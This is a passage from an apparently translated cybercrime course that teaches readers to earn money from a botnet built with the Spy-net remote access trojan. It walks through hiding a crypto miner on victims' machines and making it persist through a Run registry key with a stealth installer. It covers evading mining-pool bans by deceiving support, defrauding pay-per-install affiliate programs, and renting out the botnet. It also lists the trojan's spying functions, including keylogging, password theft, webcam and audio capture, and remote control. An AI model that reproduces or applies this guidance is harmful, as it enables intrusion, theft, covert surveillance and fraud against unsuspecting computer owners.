Where "file name" we indicate the executable of our miner Phoenix.exe. For less palpability, we can rename the miner itself under any system service.
Now we save our txt in the form "filename.js", so we get a ready-made script.
The last thing left for us is to register it in the victim's registry.
Select the bot and right-click. We select the item "Registry editor" and the registry editor opens.
Go to - HKEY_LOCAL_MACHINESOFTWAREMicrosoftWin
dowsCurrentVersionRun
Right-click on the right field and select "New - String value"
A window opens where in the name field we specify the name of the parameter, and in the data field we specify the path on the victim's computer to our script. I recommend that you always put the script in one place so as not to get confused.
Now our miner always starts when you turn on the computer in stealth mode.
The miner can only be seen in the processes of the task manager, if you rename it in any of the system files, then the victim will never find it. In principle, even if the file is left with the original name vryatli, it will catch the eye of our victim, because few people rummage in the task manager to find unnecessary running processes.
Second way.
This method is suitable for mass uploading of the miner to our bots.
To do this, you need to create an installer for unpacking our miner in hidden mode and registering it in the registry.
To do this, you can use any similar packers, but I will give an example using the already familiar Smart Install Maker.
We open. In the Information menu. We need to change the name and choose the path to save the installer. We come up with any name (the main thing is that it would not be gibberish), all items - version, company, website, support - fill in at our discretion and in the "save as" column, a convenient way for you to save the
installer. Leave the compression type unchanged.
Go to the Files menu. In the menu in the lower right corner there is a shortcut - "add files from folder", click on it. Find the folder with our miner and click OK. All files of our miner have been added to the file list. Now we select the directory where our miner will be extracted after installation.
I recommend using directories -% AppData%,% ProgramFiles%,% SystemDir%,% WindowsDir% (these are the folders where the miner will be installed) and select the existing folder in this directory. For example -% ProgramFiles% Windows Life
Leave the rest as in the screenshot: If the file exists: Replace Uncheck the box - Uninstall Go to the Requirements menu.
We put a tick in the item "Close running applications". In the line "Searched string"
prescribe - Phoenix.exe. In the line "Search type" select - the name of the application file.
Dialogues menu. Here we just need to put a tick above the topmost item - "Hidden installation". Registry menu. In the bottom menu on the right there is a shortcut - "Add".
Click on it and a window pops up. Specify the root key - HKEY_LOCAL_MACHINE
Specify the subkey - SOFTWAREMicrosoftWindowsCurrentVersionRun
You can specify any parameter. We leave the value type the same. In the Value, we write the unpacking path -% ProgramFiles% Windows Life And uncheck the box "Uninstall"
Command menu.
Again, in the lower right menu we find the shortcut "Add" and click on it and a window opens. In the command Type line, leave the "application"
To the right of the "Command" line, find the shortcut - "select a file from the list of files used", click on it and select the line with the end of phoenix.exe from the list. Leave the parameters empty. Run as - select "Hide". When to execute - select "after unpacking" Menu Uninstaller - Settings. Uncheck the box "Create uninstaller". We finished with the settings, now click on the "Compile" shortcut in the top menu and create our installation file. Now we need to install this installation for bots.
Everything is very simple, go to Spy-net, select our bots, right-click and select the item - Send file and -> Run hidden and select our installer from the list. Thus, it will download, install and run in stealth mode.
Bypass bans
All large pools are aware of botnets and therefore have an extremely negative attitude towards botnets. If you have a serious network of bots and you are going to go to mine for a large pool, then it is unlikely that anything will come of it. But there are some ways to help you avoid getting banned.
1. There are a lot of miners on large pools and therefore it is difficult for them to keep track of some of them. But if one miner stands out for its capacities, then such a miner is easy to notice, and if they notice him, they will notice the fact that several hundred IP addresses are accessing his worker, this may indicate that bitcoins are mined from several hundred computers at once and not from one user. Naturally, such workers are immediately frozen until the reasons are clarified.
In order that such situations do not arise, our bots need to be divided by accounts. That is, a certain number of bots must be allocated to one account. Let's take 50btc pool as an example. The optimal number of bots per account is no more than 30 bots and the power is no more than 1 Gh / sek. If you follow strictly such criteria, then there will be no problems with freezing, at least I did not have such problems. Yes, the only problem is that if you have a large number of bots, you need to create many accounts, but while you are gaining momentum and at the initial stage you will not have so many bots, then you do not need to create dozens of accounts a day. And when you are already well overclocked, then you can think about your own pool for your bots.
2. Since we are positioning our botnet as legal, why not take advantage of our agreement. Honestly, I
started working with licensing agreements only because of mining.
If our account has been frozen, then the only chance to unfreeze it is a conversation with the support or the pool administration.
Without obscenities, without insults and accusations, we describe the situation that you have an agreement with users who have a miner installed with our data and that these users are aware that bitcoins are mined with the help of their machines and we provide them with our agreement, the installer and the source from where the installer is downloaded (the installer follows remake for an open installation and re-fill).
After some time (usually from a day), our account is unfrozen. There were cases when the support did not react at all. In such cases, it is best to write to them with soap or on social networks.
Promotion of affiliate programs
Surely many of you have come across and tried (most likely some did make money) to make money on a PP (affiliate program).
PPs come in different directions - pay-per-click (PPC), pay-per-action (CPA), and so on, but we'll talk about PPIs.
The main PPs with payment for installation on the Runet are - Profitraf.ru and Loadmoney.ru
We'll consider Profitraf.ru.
Let's start with the fact that in order to work normally with PP data, you need a site with download traffic, that is, any site where various software's, games, etc. are posted.
You don't have to have a popular site. You can rivet your site on ukoz and fill in dozens of programs.
Since our traffic will come from a botnet, we only need a site to make it appear that we have a site from which we are pouring traffic (Although our bots are live and
targeted traffic, it is not worth knowing that traffic is coming from the botnet of the PP administration)
So, we have created a website, uploaded several programs there - it's done!
Now let's move on to registration.
To register at Profitraf.ru you need invites (invitations). It is not difficult to get them, just go to the site - Profitraf-invite.ru, enter your soap there and instantly
get an invite.
I think everything is clear with registration.
After registration, we need to add our site. Go to the "sites" menu, fill in all the fields and to check them, do not forget to add the file "a4dadd7.html" to the root folder (the main folder where the rest of the folders and files are located) of your site.
Usually it takes no more than a day to wait for confirmation.
When your site is confirmed, go to the "code setup" menu.
The bottom line is to change the code for downloading our files with the substitution of their domain.
I will not describe the whole process of changing the code, everything is described in detail there (if you created a site on yukose, then there are separate settings for such sites).
So, we changed the codes, now we need to drive traffic to our downloads. To do this, select bots (I do not recommend downloading files in large batches of bots, because they can follow it) and select the "Download and execute file" item.
In the window that appears, enter the direct download link and click OK, after which a window will pop up asking - "Do you want to run in hidden mode?". Click "Yes".
Such shenanigans can be done with any PPI affiliate networks, I do not recommend limiting yourself to one PP, because we always have traffic and PPs are getting more and more every month.
Rental
If you have a decent network of bots and you are too lazy to do anything or figure out how to make money on them, then the easiest way is to simply rent it out. Or, alternatively, you can collect bots for yourself and separately for rent. But the most interesting thing is that by renting it out, you can still use it (only the tenant does not need to know about this).
Now let's talk about the price. The optimal price for renting a botnet is $ 0.1-0.15 per bot. However, there are very few offers for renting a botnet and therefore the price can be overstated. You can set the price depending on your appetite, but not less than 10 rubles per bot.
Now let's calculate it is possible to build a network of bots in the amount of several thousand in a month (if at the same time you perform actions to distribute the backdoor every day).
Well, for example, let's take the smallest thing - 1000 bots per month at $ 0.1 per bot = $ 100 per month. Even such a price per month is not a bad reward for a month of efforts, given that you can then do almost nothing (unless you just update the backdoor) and take the botnet further. In this matter, no one limits you in numbers, you can set a higher price, you can further build up the network.
To all this I want to add that now you have in your hands a unique tool that is suitable both for making money and for other pranks. Those ways of making money that are presented in the course are a small fraction of all the ways that exist and you can still think of. Yes, many of the methods require special functions that this backdoor does not have. But I can say with confidence that there are no Trojans that have all the functions at once.
But the backdoor has the function of uploading files to the victim. So no one bothers to plant new Trojans with other functions on your bots. These can be grabbers of
certain resources (banks, sites), drug traffickers (votes, views, uniques), spammers, DDOSers, etc. The scope for imagination is endless.
Every year, new types of earnings appear on the network, and with the help of a botnet, it will always be possible to earn money on new topics for making money.
You need to work on building your own network of bots every day, as elsewhere. To succeed, you need to work every day. The more days you devote to working with a botnet, the larger your network of bots will be and, accordingly, the more income you will have. Each new bot is a "ruble" in your pocket.
The more bots and sources of income connected to them, the more you earn. If one source of income runs out, look for a new source. After all, you have a tool that can siphon resources from almost anywhere. The most interesting thing is that with the help of our tool you can download resources from several places at once. The most important thing is how to overcome your laziness and go to success.
Yes, it will not be easy for someone, but before thinking that it is difficult, ask yourself a question - are you doing everything to make it easier for you and how much time do you devote to this business? The more you work and devote time to building your network, the faster it will grow! Remember!
Addition
As soon as we created the backdoor and the first bots appeared, the question arises - how to manage them and what functions the server has.
In the Spy-net client window, select any bot and right-click on it.
We see a long list. These are all functions for managing our bots. Let's sort them out in order!
1. "File manager"
By clicking on this item, the file manager of our bot opens.
At the top there are 2 tabs - "file manager" and "search file". The first tab is the file manager itself, and the second tab is useful for finding the desired file, you just need to enter the name of the desired file, everything is simple.
Under the tab "file manager" we see 2 address lines for quick transition to standard folders.
- % WIN% - "WINDOWS" folder;
- % SYS% - "System32" folder;
- % RECENT% - recent files and documents;
- % DESKTOP% - desktop;
- Local drives and removable media.
Let's choose C: - Local Disk. The path - C: appeared in the address bar and the folder of the local disk was opened. Right-clicking on the desired file or folder
will open the file management menu. Let's consider it in more detail:
Refresh - refresh the list of files and folders;
List shared network folders - getting a list of shared network resources.
The list is added to the left menu in the FM header;
Download folder - download a folder;
File download - download a file;
File download (recursive) - download a file, keeping the folder structure;
Send file - download a file;
Send file (FTP) - send a file to an FTP server.
Add to download list - add to the download list. The
download will not happen, the client will wait for your command to start the download. The file will go to the bottom of the FM;
Run - run the file. There are 2 options: in stealth mode and normal;
Delete - delete a file;
Rename - rename;
Copy - copy;
Paste - paste;
Create folder - create a folder;
Set as wallpapper - set the picture as the desktop wallpaper;
Show image - view the picture. A
thumbnail of this image will be displayed in the lower part in a black square ;
Attributes - change file attributes;
Open folders of downloads - a window opens with what you downloaded from
the victim's file system. Actually, all downloaded files will be located here. In
those log keylogger.
At the bottom of the file manager, there is a field for all uploaded and downloaded files.
This field also has its own items for managing files:
Pause the transfer - pauses the download of a file (folder);
Start / Restart the transfer - start loading;
First position - move to the first position of the list;
Up a - raise;
Down position - up one position;
Last position - to the last line of the list;
Delete transfers complete - remove completed transfers from the list;
Delete transfer - delete download;
Stop download folder - stop downloading a folder;
Open folders of downloads - opens a list of downloaded files from the victim.
2. "Keylogger"
Click on the "Keylogger" menu and a window opens. Everything is simple and straightforward.
On the right we see 4 points:
Download - download the current log from the victim;
Delete - delete the current log;
Save - save the log in text format;
Disable - disable keylogger logging;
I note right away that there is one drawback in the keylogger - it does not understand the Cyrillic alphabet.
It's best not to be stingy, order a normal keylogger and upload it to your bots.
3. "Registry editor"
Selecting the menu "Registry editor", we open the registry editor of our bot.
Everything is like in a regular registry editor.
To create a key, right-click and select the "New" item:
"String" Value - a string parameter
"Bynary" Value - a binary parameter
"DWORD" Value - a DWORD parameter (32 bits)
"Multi-String" Value - a multi-string parameter
4. "DOS Promt"
When opened, a blank window appears. Right-click on an empty window to open the menu.
Let's analyze the menu items:
- Enable - enable DOS;
- Disable - deactivate DOS;
- Save - save the contents of the window;
- Exit - exit.
PS: This is not a DDOS attack feature. This is the DOS command line.
5. "Clipboard"
This menu opens the contents of the victim's clipboard to us. For those who do not know, the clipboard is a copied piece of information (file, text) in order to paste it in the right place. To see the clipboard of our bot, you need to click the "refresh" button in the lower right corner. And in order to change the clipboard of our bot, press the "Set" button and set your value.
6. "Device list"
In this menu we see a list of installed equipment on the bot's PC.
7. "Active ports list"
After our window has opened, press the "refresh" button and we see a list of open ports. Also in this window you can see information about the local and
external IP addresses, protocol, port status and the process through which the port is open.
Our server is highlighted in red.
By right-clicking on any line, a menu will appear:
Refresh - refresh the window;
DNS resolve - change the look of a remote IP to its DNS records. After setting this parameter, you need to refresh the window;
End connection - close the connection;
Kill Process - kill the process that opened the port;
Exit - exit.
8. "Installed Programs"
Selecting the item "Installed programs" in the lower right corner, press the button "refresh" and a list of installed programs appears. By right-clicking on the
program, a menu will appear:
- Resfresh - refresh the window;
- Uninstall - uninstall a program. A window for uninstalling the program will appear in open mode. Left from the side of the bot is guaranteed;
- Exit - exit.
9. "Windows list"
In this menu, we see the entire list of windows for our bot.
Right-clicking on the window will open a menu:
- Refresh - refresh the window;
- Close - close the window;
- Maximize - maximize the window to full screen;
- Minimize - minimize to the taskbar;
- Show / Restore - show / restore;
- Hide - hide;
- Minimize all - minimize all windows to the taskbar;
- Rename - rename the window;
- Lock button [X] "Close" - prohibit closing this window;
- Unlock button [X] "Close" - allow closing this window
- Exit - exit.
Those windows that are highlighted in gray are launched in hidden mode or minimized.
10. "Service list"
In this menu, we see all the running services of our bot.
You can also see which of them are launched by status. By right-clicking on the service, we open the menu:
- Refresh - refresh the window;
- Start - start the service;
- Stop - stop the service;
- Uninstall - remove a service;
- Install - install the service. We indicate the name of the service, its description, and the path to the file;
- Exit - exit.
11. "Processes list"
In this menu, we see all the running processes of our bot. This menu is somewhat similar to the task manager with the only difference - you cannot remove and install.
12. "Capture audio"
This function allows you to capture sound from the computer of our bot. That is, we can listen to what our victim is listening to now. We can listen to exactly what is
being played on the computer at the moment, and not what is happening in his room listening through a microphone.
In this menu, you can set the channel frequency and sound quality.
13. "Remote Desktop"
This feature allows you to capture desktop actions in real time.
Watching the bot's desktop, he will not notice or suspect anything. On the left side, we have 3 buttons:
- Single - Refreshes the window once. Clicked - updated;
- Start - start constant updating of the window;
- End - stop constantly updating the window.
Under the buttons we see the "Interval" field. The interval for saving frames is set here. By ticking the “save” box and selecting a certain interval, the backdoor will start screening the desktop at a certain interval and all screenshots will be uploaded to the “Desktop” folder, which will be located in the folder of our spy-net client.
At the bottom there are items "Mouse" and "Keyboard". By selecting them, we will be able to control the victim's desktop using our mouse and keyboard, but our cursor will not be visible to the victim.
The slider bar at the bottom adjusts the image quality of the desktop. The higher the quality, the more the image will slow down.
14. "Capture Webcam"
This function allows you to capture images from a webcam.
The window is similar to the previous desktop capture window. There are also buttons on the left:
- Start - start capturing a webcam;
- End - stop capturing the webcam.
Just like with the desktop capture function, you can save frames here. We select the interval and put a tick in the "save" item.
15. "Extra options"
This menu is sort of an additional option to control. There are 3 tabs with different functions.
- Message box;
- Miscellaneous;
- MSN messenger.
So, let's analyze each one. "Message box"
This function is rather useless. It allows you to send messages to the victim in the form of error notifications. There was a similar function when the server was created.
"Miscellaneous"
This function is also not so useful, but you can amuse yourself. Using this function, you can control the victim's PC - turn off or restart the PC, or turn off the monitor. The whole list of functions:
- Start button - hide / block the Start menu;
- Desktop icons - hide / block icons on the desktop;
- Taskbar - hide / lock the taskbar;
- Mouse and keyboard - block the mouse and keyboard;
- System tray icons - hide icons from the system tray;
- Disk tray - open / close the CD-ROM tray.
"MSN messenger"
Sends messages through the victims' MSN accounts.
16. "CHAT"
The function allows you to conduct a dialogue with our victim through the opened chat window. I think this function is useful only for the purpose of mocking.
First, we need to set the chat parameters.
- Chat Windows title - the name of the chat window;
- Server name - victim's nickname;
- Client name is your nickname.
After we have finished with the settings, we send a message to the victim and a chat window appears on the victim's desktop that she cannot close. You can also conduct a dialogue with several victims at once.
17. "Desktop image"
Using this function, you can take a screenshot of the victim's desktop and it will appear in the upper right window of the Spy-net client.
18. "HTTP proxy"
A very useful feature. With its help, you can make a proxy server out of the victim.
Ie we will sit through the IP of our victim. We select this function, register the port, press “start” and use it.
19. "Passwords"
This function is responsible for collecting saved passwords from the victim's browsers. But the big minus is that this function only works with the IE browser and old versions of Opera and Mozilla.
20. "Search ..."
This function is necessary to search for the necessary files on the victim's computer or search for words in a keylogger. We choose which of the search options we need and enter the word that we need to find, at least 3 characters. Click OK and a window appears with a list of victims who have this file or word in the logs.
21. "Download and execute file"
This function allows you to download from the network and run files on the victim's computer. The extension can be anything.
In the window, enter a direct link to the file we need, click "OK". Next, he will suggest whether to run the file in hidden mode. We choose "Yes".
22. "Open WEB-page"
This function can open any web page from the victim's computer. Just enter the link where you want to go, click "OK" and the page opens in the default browser for our bot.
23. "Run command"
The function allows you to launch an application with an additional parameter. Similar to the Run command in Start.
24. "Send file and ..."
This function allows us to send our bots any file that is on our PC and run it in hidden mode or in normal mode.
25. "Update server"
Server update function.
There are 2 ways:
From local file - we take a new server file from our computer where the client is located ;
From URL - from a server on the Internet. The link must be direct to the new server;
Thus, if there is a need to make changes to the server (the address or ports have changed ), then you can update it in this way.
26. "Ping"
The function allows you to ping our bots, that is, to check the connection speed.
The quality of the connection can be determined by the color of the squares in the "identification" field.
If the connection is good, the square is green.
If bad, the square is red.
If there is no connection, the square is white.
Everything is logical)
27. "Recconect to adress ..."
The function will allow us to redirect our victims to a different address or port.
28. "Disconnect" Disconnects the
connection with the victim, after restarting the victim will be on the list again.
29. "Uninstall"
Completely destroys our Trojan on the victim's computer.
30. "Rename"
The function allows you to change the name and identifier of our server.
incashwetrust.biz
